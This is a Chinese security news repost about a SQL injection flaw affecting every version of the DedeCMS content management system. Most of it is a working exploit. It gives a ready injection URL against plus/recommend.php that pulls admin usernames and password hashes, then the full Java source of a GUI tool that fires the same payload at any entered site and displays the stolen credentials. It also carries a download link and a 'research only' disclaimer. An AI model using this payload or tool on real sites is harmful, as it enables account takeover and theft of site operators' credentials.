DedeCMS全版本通杀SQL注入漏洞利用代码及工具

安全 漏洞
近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞。

dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。

DedeCMS全版本通杀SQL注入漏洞利用代码及工具

近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下:

EXP:

Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'

or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select

CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`

limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type]

[type]=application/octet-stream&_FILES[type][size]=111

利用工具源码(by 园长):

package org.javaweb.dede.ui;
 
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
 
/**
 *
 * @author yz
 */
public class MainFrame extends javax.swing.JFrame {
 
    private static final long serialVersionUID = 1L;
 
    /**
     * Creates new form MainFrame
     */
    public MainFrame() {
        initComponents();
    }
 
    public String request(String url){
        String str = "",tmp;
        try {
            BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
            while((tmp=br.readLine())!=null){
                str+=tmp+"\r\n";
            }
        } catch (Exception e) {
            jTextArea1.setText(e.toString());
        }
        return str;
    }
 
    private void initComponents() {
 
        jPanel1 = new javax.swing.JPanel();
        jLabel1 = new javax.swing.JLabel();
        jTextField1 = new javax.swing.JTextField();
        jButton1 = new javax.swing.JButton();
        jScrollPane1 = new javax.swing.JScrollPane();
        jTextArea1 = new javax.swing.JTextArea();
 
        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
 
        jLabel1.setText("URL:");
        jTextField1.setText("http://localhost");
 
        this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
 
        int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
        int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
        this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
 
        jButton1.setText("获取");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });
 
        jTextArea1.setColumns(20);
        jTextArea1.setRows(5);
        jScrollPane1.setViewportView(jTextArea1);
 
        javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
        jPanel1.setLayout(jPanel1Layout);
        jPanel1Layout.setHorizontalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
                    .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
                    .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
                        .addContainerGap()
                        .addComponent(jLabel1)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
                        .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                        .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
                .addGap(0, 0, Short.MAX_VALUE))
        );
        jPanel1Layout.setVerticalGroup(
            jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addGroup(jPanel1Layout.createSequentialGroup()
                .addContainerGap()
                .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
                    .addComponent(jLabel1)
                    .addComponent(jTextField1,
 javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
                    .addComponent(jButton1))
                .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
                .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
        );
 
        javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
        getContentPane().setLayout(layout);
        layout.setHorizontalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
        layout.setVerticalGroup(
            layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
            .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
        );
 
        pack();
    }// </editor-fold>                      
 
    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {                                       
        String url = jTextField1.getText();
        if(null==url||"".equals(url)){
            return ;
        }
        String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
        Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
        if(m.find()){
            String[] s = m.group(1).split("\\|");
            if(s.length>2){
                jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
            }
        }
    }                                      
 
    public static void main(String args[]) {
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new MainFrame().setVisible(true);
            }
        });
    }
 
    // Variables declaration - do not modify                   
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JPanel jPanel1;
    private javax.swing.JScrollPane jScrollPane1;
    private javax.swing.JTextArea jTextArea1;
    private javax.swing.JTextField jTextField1;
    // End of variables declaration                 
}

利用工具下载地址 http://pan.baidu.com/s/1sj31RLN (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2012-04-12 15:06:44

2023-12-01 16:21:42

2014-12-04 15:01:13

2017-09-07 15:39:27

2014-10-17 09:12:35

2024-05-27 09:04:05

2010-09-13 13:40:24

2012-12-19 10:36:06

2016-09-28 16:38:47

2017-05-02 09:02:14

2010-09-09 17:22:14

2009-11-02 13:47:09

2009-10-25 13:32:09

2021-09-16 09:05:45

SQL注入漏洞网络攻击

2010-10-22 15:18:18

SQL注入漏洞

2009-02-12 10:14:16

2012-04-12 13:36:59

2020-12-16 13:22:37

Web安全SQL工具

2012-11-15 13:37:32

dedecms注入脚本攻防

2023-07-26 17:13:38

点赞
收藏

51CTO技术栈公众号